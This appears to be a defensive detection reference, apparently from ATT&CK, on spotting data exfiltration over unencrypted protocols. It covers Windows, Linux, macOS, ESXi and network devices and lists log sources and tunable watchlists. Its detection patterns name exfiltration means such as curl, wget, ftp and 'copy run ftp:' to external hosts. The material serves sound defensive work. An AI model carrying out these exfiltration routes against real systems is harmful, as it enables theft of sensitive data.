Detects data access or staging events followed by outbound data flows using unencrypted protocols (e.g., FTP, HTTP) initiated by unexpected processes or to rare destinations.
| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |
| Field | Description |
|---|---|
| UnencryptedProtocolList | Set of protocols considered suspicious for outbound data exfiltration (e.g., FTP, HTTP). |
| DataTransferSizeThreshold | Defines what amount of outbound data is considered abnormal for a host/user. |
| ParentProcessDenylist | Processes that should not launch FTP/HTTP clients (e.g., winword.exe launching ftp.exe). |
Detects file access or compression utilities followed by outbound connections using curl, wget, ftp, or custom binaries communicating over unencrypted protocols.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Network Connection Creation (DC0082) | auditd:SYSCALL | connect |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |
| Network Traffic Flow (DC0078) | NSM:Flow | flow records |
| Field | Description |
|---|---|
| SensitiveDirectoryWatchlist | Flag access to paths known to store sensitive or regulated data. |
| ProcessBaseline | Define which binaries are allowed to communicate externally using HTTP/FTP. |
| TimeWindow | Correlates process/file/network within a defined time window. |
Detects abnormal outbound HTTP/FTP connections by local scripts or binaries outside of standard browser activity, following access to local documents or user data.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | macos:osquery | socket_events |
| Process Creation (DC0032) | macos:osquery | process_events |
| File Access (DC0055) | macos:unifiedlog | log stream - file subsystem |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |
| Field | Description |
|---|---|
| ScriptedClientAllowlist | Defines allowed automated agents that may transmit HTTP or FTP data (e.g., backup tools). |
| PayloadInspectionKeywordList | Terms or patterns indicating structured or sensitive data leaving via HTTP/FTP. |
Detects shell-based scripts accessing configuration files or snapshots and transmitting them over unencrypted protocols such as FTP or HTTP to non-management IPs.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | esxi:hostd | event stream |
| Network Traffic Flow (DC0078) | NSM:Flow | flow records |
| Network Traffic Content (DC0085) | NSM:Flow | http.log |
| Field | Description |
|---|---|
| VMConfigAccessPathWatchlist | Locations of VMX/CFG/SNAPSHOT files that should not be accessed by non-admin shells. |
| OutboundProtocolProfile | Expected network protocols for guest and host interfaces. |
Detects use of unencrypted protocols (e.g., TFTP, FTP, HTTP) to transfer configuration files, routing tables, or logs to untrusted IP addresses, especially using administrative commands like copy run ftp:.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | networkdevice:cli | CLI command logs |
| Network Traffic Flow (DC0078) | networkdevice:syslog | flow records |
| Network Traffic Content (DC0085) | NSM:Flow | PCAP inspection |
| Field | Description |
|---|---|
| ProtocolCommandWatchlist | Flag commands like `copy`, `archive tar`, or `upload` directed at external hosts. |
| DestinationIPBlocklist | Define external IP ranges unauthorized to receive router/switch configs. |